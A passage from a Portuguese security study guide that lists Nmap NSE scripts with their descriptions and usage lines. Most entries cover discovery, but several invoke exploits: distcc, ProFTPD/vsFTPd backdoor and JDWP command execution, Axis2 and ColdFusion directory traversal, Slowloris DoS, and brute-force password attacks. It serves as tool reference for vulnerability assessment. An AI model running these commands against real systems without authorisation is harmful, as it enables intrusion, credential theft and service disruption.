-sU --script backorifice-brute <host>


backorifice-brute.ports=<ports>

--script-args

-- @arg backorifice-brute.ports (mandatory) List of UDP ports to run


the
script
against
separated
with
","
ex.
"U:31337,25252,151-222", "U:1024-1512"

description = Connects to a BackOrifice service and gathers


information about the host and the BackOrifice service
itself.
The extracted host information includes basic system setup, list
of running processes, network resources and shares.
@usage
nmap --script backorifice-info <target> --script-args backorificeinfo.password=<password>

description = Queries a Bitcoin server for a list of known Bitcoin


nodes

www.clubedohacker.com.br

255

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -p 8333 --script bitcoin-getaddr <ip>

description = Extracts version and node information from a Bitcoin


server
@usage
nmap -p 8333 --script bitcoin-info <ip>

description = Obtains information from a Bitcoin server by calling


<code>getinfo</code> on its JSON-RPC interface.
@usage
nmap

-p
8332
--script
bitcoinrpc-info
creds.global=<user>:<pass> <target>

--script-args

description = Discovers bittorrent peers sharing a file based on a usersupplied torrent file or magnet link. Peers implement the
Bittorrent protocol and share the torrent, whereas the
nodes (only shown if the include-nodes NSE argument is
given) implement the DHT protocol and are used to track
the peers.
@usage
nmap

--script
bittorrent-discovery
--script-args
newtargets,bittorrent-discovery.torrent=<torrent_file>

www.clubedohacker.com.br

256

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Retrieves printer or scanner information from a remote
device supporting the BJNP protocol. The protocol is
known to be supported by network based Canon devices.
@usage
sudo nmap -sU -p 8611,8612 --script bjnp-discover <ip>

description = Discovers servers supporting the ATA over Ethernet


protocol. ATA over Ethernet is an ethernet protocol
developed by the Brantley Coile Company and allows for
simple, high-performance access to SATA drives over
Ethernet.
@usage
nmap --script broadcast-ataoe-discover -e <interface>

description= Attempts to discover hosts in the local network using the


DNS Service Discovery protocol and sends a NULL UDP
packet to each host to test if it is vulnerable to the Avahi
NULL UDP packet denial of service (CVE-2011-1002).
The

<code>broadcast-avahi-dos.wait</code> script argument


specifies how many number of seconds to wait before a
new attempt of host discovery.

Each host who does not respond to this second attempt will be
considered vulnerable.
Reference:

www.clubedohacker.com.br

257

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
* http://avahi.org/ticket/325
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002
@usage
nmap --script=broadcast-avahi-dos

description = Attempts to discover Canon devices (Printers/Scanners)


supporting the
BJNP protocol by sending BJNP Discover requests to the network
broadcast address for both ports associated with the protocol.
@usage
nmap --script broadcast-bjnp-discover

description = Attempts to discover DB2 servers on the network by


sending a broadcast request to port 523/udp.
@usage
nmap --script db2-discover

description = Sends a DHCPv6 request (Solicit) to the DHCPv6


multicast address, parses the response, then extracts and

www.clubedohacker.com.br

258

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
prints the address along with any options returned by the
server.
@usage
nmap -6 --script broadcast-dhcp6-discover

description = Sends a DHCP request to the broadcast address


(255.255.255.255) and reports the results. The script uses
a static MAC address (DE:AD:CO:DE:CA:FE) while
doing so in order to prevent scope exhaustion.
@usage
sudo nmap --script broadcast-dhcp-discover

description= Attempts to discover hosts' services using the DNS


Service Discovery protocol. It sends a multicast DNS-SD
query and collects all the responses.
@usage
nmap --script=broadcast-dns-service-discovery

description = Listens for the LAN sync information broadcasts that


the Dropbox.com client broadcasts every 20 seconds, then
prints all the discovered client IP addresses, port numbers,
version numbers, display names, and more.

www.clubedohacker.com.br

259

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script=broadcast-dropbox-listener
-- nmap --script=broadcast-dropbox-listener --script-args=newtargets
-Pn

description = Performs network discovery and routing information


gathering through Cisco's Enhanced Interior Gateway
Routing Protocol (EIGRP).
@usage
nmap --script=broadcast-eigrp-discovery <targets>
-- nmap --script=broadcast-eigrp-discovery <targets> -e wlan0
-- @args broadcast-eigrp-discovery.as Autonomous System value to
announce on.

description = Discovers targets that have IGMP Multicast


memberships and grabs interesting information.
@usage
nmap --script broadcast-igmp-discovery
nmap --script broadcast-igmp-discovery -e wlan0
nmap --script broadcast-igmp-discovery

www.clubedohacker.com.br

260

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
script-args

'broadcast-igmp-discovery.version=all,
igmp-discovery.timeout=3'

broadcast-

description = Discovers Microsoft SQL servers in the same broadcast


domain.
@usage
nmap --script broadcast-ms-sql-discover
nmap --script broadcast-ms-sql-discover,ms-sql-info --scriptargs=newtargets

description = Attempts to discover master browsers and the domains


they manage.
@usage
nmap --script=broadcast-netbios-master-browser

description = Discovers EMC Networker backup software servers on


a LAN by sending a network broadcast query.
@usage nmap --script broadcast-networker-discover

description = Sends a special broadcast probe to discover PCAnywhere hosts running on a LAN.

www.clubedohacker.com.br

261

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script broadcast-pc-anywhere

description = Discovers PC-DUO remote control hosts and gateways


running on a LAN by sending a special broadcast UDP
probe.
@usage
nmap --script broadcast-pc-duo

description = Discovers routers that are running PIM (Protocol


Independent Multicast).
@usage
nmap --script broadcast-pim-discovery

description = Discovers PPPoE (Point-to-Point Protocol over


Ethernet) servers using the PPPoE Discovery protocol
(PPPoED). PPPoE is an ethernet based protocol so the
script has to know what ethernet interface to use for
discovery. If no interface is specified, requests are sent
out on all available interfaces.
@usage
nmap --script broadcast-pppoe-discover

www.clubedohacker.com.br

262

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description= Discovers hosts and routing information from devices
running RIPv2 on the LAN. It does so by sending a RIPv2
Request command and collects the responses from all
devices responding to the request.
@usage
nmap --script broadcast-rip-discover

description = Discovers hosts and routing information from devices


running RIPng on the LAN by sending a broadcast RIPng
Request command and collecting any responses.
@usage
nmap --script broadcast-ripng-discover

description = Discovers Versant object databases using the broadcast


srvloc protocol.
@usage
nmap --script broadcast-versant-locate

description = Wakes a remote system up from sleep by sending a


Wake-On-Lan packet.
@usage

www.clubedohacker.com.br

263

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
nmap --script broadcast-wake-on-lan --script-args broadcastwake-on-lan.MAC='00:12:34:56:78:9A'

description = Retrieves a list of proxy servers on a LAN using the


Web Proxy Autodiscovery Protocol (WPAD).
It
implements both the DHCP and DNS methods of doing so
and starts by querying DHCP to get the address.
@usage
nmap --script broadcast-wpad-discover

description = Uses a multicast query to


the Web Services Dynamic
protocol. It also attempts
Windows Communication
services (.NET

discover devices supporting


Discovery (WS-Discovery)
to locate any published
Framework (WCF) web

4.0 or later).
@usage
sudo ./nmap --script broadcast-wsdd-discover

description = Performs brute force password auditing against the


Cassandra database.
For more information about Cassandra, see:
http://cassandra.apache.org/

www.clubedohacker.com.br

264

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -p 9160 <ip> --script=cassandra-brute

description = Attempts to get basic info and server status from a


Cassandra database. For more information about
Cassandra, see:
http://cassandra.apache.org/
@usage
nmap -p 9160 <ip> --script=cassandra-info

description = Extracts a list of Citrix servers from the ICA Browser


service.
@usage sudo ./nmap -sU --script=citrix-enum-servers -p 1604

description = Extracts the name of the server farm and member


servers from Citrix XML service.
@usage
nmap --script=citrix-enum-servers-xml -p 80,443,8080 <host>

description = Lists printers managed by the CUPS printing service.

www.clubedohacker.com.br

265

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -p 631 <ip> --script cups-info

description = Lists currently queued print jobs of the remote CUPS


service grouped by
printer.
@usage
nmap -p 631 <ip> --script cups-queue-info

description = Performs brute force password auditing against CVS


pserver authentication.
@usage
nmap -p 2401 --script cvs-brute <host>

description = Attempts to guess the name of the CVS repositories


hosted on the remote server.
@usage
nmap -p 2401 --script cvs-brute-repository <host>

www.clubedohacker.com.br

266

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Connects to a dictionary server using the DICT
protocol, runs the SHOW SERVER command, and
displays the result. The DICT protocol is defined in RFC
2229 and is a protocol which allows a client to query a
dictionary server for definitions from a set of natural
language dictionary databases.
@usage
nmap -p 2628 <ip> --script dict-info

description = Detects and exploits a remote code execution


vulnerability in the distributed compiler daemon distcc.
The vulnerability was disclosed in 2002, but is still
present in modern implementation due to poor
configuration of the service.
@usage
nmap -p 3632 <ip> --script distcc-exec --script-args="distccexec.cmd='id'"

description = Checks target IP addresses against multiple DNS antispam and open proxy blacklists and returns a list of
services for which an IP has been flagged. Checks may
be limited by service category (eg: SPAM, PROXY) or to
a specific service name.
@usage
nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'

www.clubedohacker.com.br

267

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description =Performs DNS cache snooping against a DNS server.
@usage
nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dnscache-snoop.mode=timed,dns-cachesnoop.domains={host1,host2,host3}' <target>

description = Performs a domain lookup using the edns-client-subnet


option which allows clients to specify the subnet that
queries supposedly originate from. The script uses this
option to supply a number of geographically distributed
locations in an attempt to enumerate as many different
address records as possible. The script also supports
requests using a given subnet.
http://tools.ietf.org/html/draft-vandergaast-edns-client-subnet-00
@usage
nmap -sU -p 53 --script dns-client-subnet-scan --script-args

description = Tries to enumerate domain names from the DNS server


that supports DNSSEC NSEC3 records.
References: * http://dnscurve.org/nsec3walker.html
@usage
nmap -sU -p 53 <target> --script=dns-nsec3-enum --script-args
dns-nsec3-enum.domains=example.com

www.clubedohacker.com.br

268

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -sSU -p 53 --script dns-nsec-enum --script-args dns-nsecenum.domains=example.com <target>

description = Retrieves information from a DNS nameserver by


requesting its nameserver ID (nsid) and asking for its
id.server and version.bind values. This script performs the
same queries as the following two dig commands:
- dig CH TXT bind.version @target
- dig +nsid CH TXT id.server @target
References:
[1]http://www.ietf.org/rfc/rfc5001.txt
[2]http://www.ietf.org/rfc/rfc4892.txt
@usage
nmap -sSU -p 53 --script dns-nsid <target>

description= Attempts to discover target hosts' services using the


DNS Service Discovery protocol.
@usage
nmap --script=dns-service-discovery -p 5353 <target>

www.clubedohacker.com.br

269

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Enumerates various common service (SRV) records for
a given domain name.
@usage
nmap

--script
dns-srv-enum
--script-args
enum.domain='example.com'"

"dns-srv-

description = Checks if the target IP range is part of a Zeus botnet by


querying ZTDNS @ abuse.ch.
Please review the following information before you start to scan:
* https://zeustracker.abuse.ch/ztdns.php
@usage
nmap -sn -PN --script=dns-zeustracker <ip>

description = Attempts to discover valid IBM Lotus Domino users


and download their ID files by exploiting the CVE-20065835 vulnerability.
@usage
nmap --script domino-enum-users -p 1352 <host>

description = Performs brute force password auditing against an


iPhoto Library.

www.clubedohacker.com.br

270

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script dpap-brute -p 8770 <host>

description = Performs password guessing against databases


supporting the IBM DB2 protocol such as Informix, DB2
and Derby
@usage
nmap -p 50000 --script drda-brute <target>

description = Attempts to discover multihomed systems by analysing


and comparing information collected by other scripts. The
information analyzed currently includes, SSL certificates,
SSH host keys, MAC addresses, and Netbios server
names.
@usage
sudo nmap -PN -p445,443 --script duplicates,nbstat,ssl-cert <ips>

description = Attempts to enumerate process info over the Apple


Remote Event protocol.
@usage
nmap -p 3031 <ip> --script eppc-enum-processes

www.clubedohacker.com.br

271

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Detects a vulnerability in netfilter and other firewalls
that use helpers to dynamically open ports for protocols
such as ftp and sip. For more information, see:
*

http://home.regit.org/2012/03/playing-with-network-layers-tobypass-firewalls-filtering-policy/

@usage
nmap --script firewall-bypass <target>
nmap

--script
firewall-bypass
--script-args
firewallbypass.helper="ftp",
firewall-bypass.targetport=22
<target>

description = Retrieves information from Flume master HTTP pages.


@usage
nmap --script flume-master-info -p 35871 host

description = Performs brute force password auditing against FTP


servers.
@usage
nmap --script ftp-brute -p 21 <host>

description = Tests for the presence of the ProFTPD 1.3.3c backdoor


reported as OSVDB-ID 69562. This script attempts to

www.clubedohacker.com.br

272

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
exploit
the
backdoor
using
the
innocuous
<code>id</code> command by default, but that can be
changed
with
the
<code>ftp-proftpdbackdoor.cmd</code> script argument.
@usage
nmap --script ftp-proftpd-backdoor -p 21 <host>

description = Tests for the presence of the vsFTPd 2.3.4 backdoor


reported on 2011-07-04 (CVE-2011-2523). This script
attempts to exploit the backdoor using the innocuous
<code>id</code> command by default, but that can be
changed with the <code>exploit.cmd</code> or
<code>ftp-vsftpd-backdoor.cmd</code> script arguments.
References:
*

http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpddownload-backdoored.html

*
https://dev.metasploit.com/redmine/projects/framework/re
pository/revisions/13093
* http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2011-2523
@usage
nmap --script ftp-vsftpd-backdoor -p 21 <host>

www.clubedohacker.com.br

273

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Retrieves GPS time, coordinates and speed from the
GPSD network daemon.
@usage
nmap -p 2947 <ip> --script gpsd-info

description = Reads hard disk information (such as brand, model, and


sometimes temperature) from a listening hddtemp service.
@usage
nmap -p 7634 -sV -sC <target>

description = Discovers hostnames that resolve to the target's IP


address by querying the Robtex service at
http://www.robtex.com/dns/.
@usage
nmap --script hostmap-robtex

description = Grabs affiliate network IDs (e.g. Google AdSense or


Analytics, Amazon Associates, etc.) from a web page.
These can be used to identify pages with the same owner.
@usage
-- nmap --script=http-affiliate-id.nse --script-args http-affiliateid.url-path=/website <target>

www.clubedohacker.com.br

274

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Exploits a remote code execution vulnerability in
Awstats Totals 1.0 up to 1.14 and possibly other products
based on it (CVE: 2008-3922).
References: * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE2008-3922
* http://www.exploit-db.com/exploits/17324/
@usage
nmap -sV --script http-awstatstotals-exec.nse --script-args 'httpawstatstotals-exec.cmd="uname
-a",
httpawstatstotals-exec.uri=/awstats/index.php' <target>
-- nmap -sV --script http-awstatstotals-exec.nse <target>

description = Exploits a directory traversal vulnerability in Apache


Axis2 version 1.4.1 by sending a specially crafted request
to the parameter <code>xsd</code> (OSVDB-59001).
@usage
nmap -p80,8080 --script http-axis2-dir-traversal --script-args
'http-axis2-dir-traversal.file=../../../../../../../etc/issue'
<host/ip>
nmap -p80 --script http-axis2-dir-traversal <host/ip>

description = Attempts to retrieve the configuration settings from a


Barracuda Networks Spam & Virus Firewall device using
the directory traversal vulnerability described at

www.clubedohacker.com.br

275

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
http://seclists.org/fulldisclosure/2010/Oct/119.
@usage
nmap --script http-barracuda-dir-traversal --script-args httpmax-cache-size=5000000 -p <port> <host>
description = Performs brute force password auditing against http
basic authentication.
@usage
nmap --script http-brute -p 80 <host>

description = Obtains the CakePHP version of a web application built


with the CakePHP framework by fingerprinting default
files shipped with the CakePHP framework.
@usage
nmap -p80,443 --script http-cakephp-version <host/ip>

description = Attempts to enumerate the hashed Domino Internet


Passwords that are (by default) accessible by all
authenticated users. This script can also download any
Domino ID Files attached to the Person document.
@usage
nmap --script domino-enum-passwords -p 80 <host> --script-args
domino-enum-passwords.username='patrik
karlsson',domino-enum-passwords.password=secret

www.clubedohacker.com.br

276

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Enumerates Drupal users by exploiting a an information
disclosure vulnerability in Views, Drupal's most popular
module.For more information,see:
* http://www.madirish.net/node/465
@usage
nmap --script=http-drupal-enum-users --script-args http-drupalenum-users.root="/path/" <targets>

description = Enumerates the installed Drupal modules by using a list


of known modules.
@usage
nmap --script=http-drupal-modules --script-args http-drupalmodules.root="/path/",http-drupalmodules.number=1000 <targets>

description = Spiders a web site and collects e-mail addresses.


@usage
nmap --script=http-email-harvest <target>

description = Spiders a site's images looking for interesting exif data


embedded in .jpg files. Displays the make and model of
the camera, the date the photo was taken, and the
embedded geotag information.

www.clubedohacker.com.br

277

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script http-exif-spider -p80,443 <host>

description = Performs brute force password auditing against http


form-based authentication.
@usage
nmap --script http-form-brute -p 80 <host>

description = Checks whether target machines are vulnerable to


anonymous Frontpage login.
@usage
nmap <target> -p 80 --script=http-frontpage-login

description = Retrieves the locations of all "Find my iPhone" enabled


iOS devices by querying the MobileMe web service
(authentication required).
@usage
nmap

-sn -Pn --script http-icloud-findmyiphone


args='username=<user>,password=<pass>'

www.clubedohacker.com.br

--script-

278

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Checks for a vulnerability in IIS 5.1/6.0 that allows
arbitrary users to access secured WebDAV folders by
searching for a password-protected folder and attempting
to access it. This vulnerability was patched in Microsoft
Security Bulletin MS09-020, http://nmap.org/r/ms09-020.
@usage
nmap --script http-iis-webdav-vuln -p80,8080 <host>

description = Performs brute force password auditing against Joomla


web CMS installations.
@usage
nmap

-sV
--script
http-joomla-brute
--script-args
'userdb=users.txt,passdb=passwds.txt,http-joomlabrute.hostname=domain.com,

http-joomla-brute.threads=3,brute.firstonly=true' <target>
nmap -sV --script http-joomla-brute <target>

description = Exploits a directory traversal vulnerability existing in


Majordomo2 to retrieve remote files.
@usage
nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

www.clubedohacker.com.br

279

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Spiders a website and attempts to identify open
redirects. Open redirects are handlers which commonly
take a URL as a parameter and responds with a http
redirect (3XX) to the target. Risks of open redirects are
described
at
http://cwe.mitre.org/data/definitions/601.html.
@usage
nmap --script=http-open-redirect <target>

description = Checks if a web server is vulnerable to directory


traversal
by
attempting
to
retrieve
<code>/etc/passwd</code> or <code>\boot.ini</code>.
@usage
nmap --script http-passwd --script-args http-passwd.root=/test/
<target>

description= Crawls a web server and attempts to find PHP files


vulnerable to reflected cross site scripting via the variable
$_SERVER["PHP_SELF"].
This script crawls the webserver to create a list of PHP files and then
sends an attack vector/probe to identify PHP_SELF cross
site scripting vulnerabilities.
@usage
nmap --script=http-phpself-xss -p80 <target>

www.clubedohacker.com.br

280

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
nmap -sV --script http-self-xss <target>

description = Performs brute force password guessing against HTTP


proxy servers.
@usage
nmap --script http-proxy-brute -p 8080 <host>

description = Crawls webservers in search of RFI (remote file


inclusion) vulnerabilities. It tests every form field it finds
and every parameter of a URL containing a query.
@usage
nmap --script http-rfi-spider -p80 <host>

description = Finds up to 100 domain names which use the same


name server as the target by querying the Robtex service
at http://www.robtex.com/dns/.
@usage
nmap --script http-robtex-shared-ns

description = Spiders a web server and displays its directory structure


along with number and types of files in each folder. Note

www.clubedohacker.com.br

281

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
that files listed as having an 'Other' extension are ones that
have no extension or that are a root document.
@usage
nmap --script http-sitemap-generator -p 80 <host>

description = Tests a web server for vulnerability to the Slowloris


DoS attack by launching a Slowloris attack.
Slowloris was described at Defcon 17 by RSnake
(see http://ha.ckers.org/slowloris/).
@usage
nmap --script http-slowloris --max-parallelism 400 <target>

description = Tests a web server for vulnerability to the Slowloris


DoS attack without actually launching a DoS attack.
Slowloris was described at Defcon 17 by RSnake
(see http://ha.ckers.org/slowloris/).
@usage
nmap --script http-slowloris-check <target>

www.clubedohacker.com.br

282

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Sends an HTTP TRACE request and shows if the
method TRACE is enabled. If debug is enabled, it returns
the header fields that were modified in the response.
@usage
nmap --script http-trace -d <ip>

description = Exploits the Max-Forwards HTTP header to detect the


presence of reverse proxies.
@usage
nmap --script=http-traceroute <targets>

description = Spiders a website and attempts to identify output


escaping problems where content is reflected back to the
user. This script locates all parameters, ?x=foo&y=bar
and checks if the values are reflected on the page.
@usage
nmap --script=http-unsafe-output-escaping <target>

description = Searches for web virtual hostnames by making a large


number of HEAD requests against http servers using
common hostnames.

www.clubedohacker.com.br

283

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script http-vhosts -p 80,8080,443 <target>

description = Checks whether a file has been determined as malware


by Virustotal. Virustotal is a service that provides the
capability to scan a file or check a checksum against a
number of the major antivirus vendors. The script uses the
public API which requires a valid API key and has a limit
on 4 queries per minute.
A key can be acquired by registering as a user on the virustotal web
page: http://www.virustotal.com

@usage
nmap

--script
http-virustotal
--scriptargs='apikey="<key>",checksum="275a021bbfb6489e
54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f
"'

description = Connects to a VLC Streamer helper service and lists


directory contents. The VLC Streamer helper service is
used by the iOS VLC Streamer application to enable
streaming of multimedia content from the remote server to
the device.
@usage
nmap -p 54340 --script http-vlcstreamer-ls <ip>

www.clubedohacker.com.br

284

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Checks for a path-traversal vulnerability in VMWare
ESX, ESXi, and Server (CVE-2009-3733).
@usage
nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>

description = Executes a directory traversal attack against a


ColdFusion server and tries to grab the password hash for
the administrator user.
@usage
nmap --script http-vuln-cve2010-2861 <host>

description = Tests for the CVE-2011-3368 (Reverse Proxy Bypass)


vulnerability in Apache HTTP server's reverse proxy
mode.
The script will run 3 tests: o the loopback test, with 3 payloads to
handle different rewrite rules o the internal hosts test.
According to Contextis, we expect a delay before a server
error.
References:
http://www.contextis.com/research/blog/reverseproxybypass/
@usage
nmap --script http-vuln-cve2011-3368 <targets>

www.clubedohacker.com.br

285

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Detects PHP-CGI installations that are vulnerable to
CVE-2012-1823, This critical vulnerability allows
attackers to retrieve source code and execute code
remotely.
@usage
nmap -sV --script http-vuln-cve2012-1823 <target>
nmap -p80 --script http-vuln-cve2012-1823 --script-args httpvuln-cve2012-1823.uri=/test.php <target>

description = Tries to detect the presence of a web application


firewall and its type and version.
@usage
nmap --script=http-waf-fingerprint <targets>
nmap

--script=http-waf-fingerprint --script-args
fingerprint.intensive=1 <targets>

http-waf-

description = Enumerates usernames in Wordpress blog/CMS


installations by exploiting an information disclosure
vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and
3.2-beta2 and possibly others.
Original advisory:
*

http://www.talsoft.com.ar/index.php/research/securityadvisories/wordpress-user-id-and-user-name-disclosure

www.clubedohacker.com.br

286

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -p80 --script http-wordpress-enum <target>
nmap -sV --script http-wordpress-enum --script-args limit=50
<target>

description = Tries to obtain a list of installed WordPress plugins by


brute force testing for known plugins.
@usage
nmap

--script=http-wordpress-plugins
--script-args
httpwordpress-plugins.root="/blog/",http-wordpressplugins.search=500 <targets>

description = Performs brute force password auditing against the


Asterisk IAX2 protocol.
@usage
nmap -sU -p 4569 <ip> --script iax2-brute

description = Tests a list of known ICAP service names and prints


information about any it detects. The Internet Content
Adaptation Protocol (ICAP) is used to extend transparent
proxy servers and is generally used for content filtering
and antivirus scanning.

www.clubedohacker.com.br

287

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -p 1344 <ip> --script icap-info

description = Performs brute force password auditing against IMAP


servers using either LOGIN, PLAIN, CRAM-MD5,
DIGEST-MD5 or NTLM authentication.
@usage
nmap -p 143,993 --script imap-brute <host>

description = Performs brute force password auditing against IBM


Informix Dynamic Server.
@usage
nmap --script informix-brute -p 9088 <host>

description = Runs a query against IBM Informix Dynamic Server


using the given authentication credentials (see also:
informix-brute).
@usage
nmap -p 9088 <host> --script informix-query --script-args
informix-query.username=informix,informixquery.password=informix

www.clubedohacker.com.br

288

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Retrieves a list of tables and column definitions for
each database on an Informix server.
@usage
nmap -p 9088 <host> --script informix-tables --script-args
informix-tables.username=informix,informixtables.password=informix

description = Detects whether the remote device has ip forwarding or


"Internet connection sharing" enabled, by sending an
ICMP echo request to a given target using the scanned
host as default gateway.
@usage
sudo

nmap -sn <target> --script ip-forwarding


args='target=www.example.com'

--script-

description = Tries to identify the physical location of an IP address


using the Geobytes geolocation web service
(http://www.geobytes.com/iplocator.htm).
@usage
nmap --script ip-geolocation-geobytes <target>

description = Tries to identify the physical location of an IP address


using the Geoplugin geolocation web service

www.clubedohacker.com.br

289

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
(http://www.geoplugin.com/). There is no limit on
lookups using this service.
@usage
nmap --script ip-geolocation-geoplugin <target>

description = Tries to identify the physical location of an IP address


using a Geolocation Maxmind database file (available
from
http://www.maxmind.com/app/ip-location). This script supports
queries using all Maxmind databases that are supported
by their API including the commercial ones.
@usage
nmap --script ip-geolocation-maxmind <target> [--script-args ipgeolocation.maxmind_db=<filename>]

description = Classifies a host's IP ID sequence (test for susceptibility


to idle scan).
@usage
nmap --script ipidseq [--script-args probeport=port] target
@args probeport Set destination port to probe

www.clubedohacker.com.br

290

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Obtains hostnames, IPv4 and IPv6 addresses through
IPv6 Node Information Queries.

@usage nmap -6 <target>

description = Checks an IRC server for channels that are commonly


used by malicious botnets.
@usage
nmap -p 6667 --script=irc-botnet-channels <target>
@usage
nmap -p 6667 --script=irc-botnet-channels --script-args 'ircbotnet-channels.channels={chan1,chan2,chan3}'
<target>

description= Performs brute force password auditing against IRC


(Internet Relay Chat) servers.
@usage
nmap --script irc-brute -p 6667 <ip>

description= Performs brute force password auditing against IRC


(Internet Relay Chat) servers supporting SASL
authentication.

www.clubedohacker.com.br

291

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script irc-sasl-brute -p 6667 <ip>

description = Lists portals and iSCSI nodes registered with the


Internet Storage Name Service (iSNS).
@usage
nmap -p 3205 <ip> --script isns-info

description = Attempts to exploit java's remote debugging port. When


remote debugging port is left open, it is possible to inject
java bytecode and achieve remote code execution. This
script abuses this to inject and execute a Java class file
that executes the supplied shell command and returns its
output.
@usage nmap -sT <target> -p <port> --script=+jdwp-exec -script-args cmd="date"

description = Attempts to exploit java's remote debugging port.


When remote debugging port is left open, it is possible to
inject java bytecode and achieve remote code execution.
This script injects and execute a Java class file that returns
remote system information.
@usage nmap -sT <target> -p <port> --script=+jdwp-info

www.clubedohacker.com.br

292

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Attempts to exploit java's remote debugging port.
When remote debugging port is left open, it is possible to
inject java bytecode and achieve remote code execution.
This script allows injection of arbitrary class files.
@usage nmap -sT <target> -p <port> --script=+jdwp-inject -script-args filename=HelloWorld.class

description = Discovers valid usernames by brute force querying


likely usernames against a Kerberos service.
@usage
nmap -p 88 --script krb5-enum-users --script-args krb5-enumusers.realm='test'

description = Attempts to brute-force LDAP authentication. By


default it uses the built-in username and password lists. In
order to use your own lists use the <code>userdb</code>
and <code>passdb</code> script arguments.
@usage
nmap -p 389 --script ldap-brute --script-args \
ldap.base='"cn=users,dc=cqure,dc=net"' <host>
@usage
nmap -p 636 --script ldap-novell-getpass --script-args \
'ldap-novell-getpass.username="CN=admin,O=cqure", \

www.clubedohacker.com.br

293

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
ldap-novell-getpass.password=pass1234, \
ldap-novell-getpass.account="CN=paka,OU=hr,O=cqure"'

description = Retrieves the LDAP root DSA-specific Entry (DSE)


@usage
nmap -p 389 --script ldap-rootdse <host>

description = Attempts to perform an LDAP search and returns all


matches.
@usage
nmap

-p
389
--script
ldap-search
--script-args
'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=n
et",ldap.password=ldaptest,

-- ldap.qfilter=users,ldap.attrib=sAMAccountName' <host>

description = Resolves a hostname by using the LLMNR (Link-Local


Multicast Name Resolution) protocol.
* http://technet.microsoft.com/en-us/library/bb878128.aspx
@usage
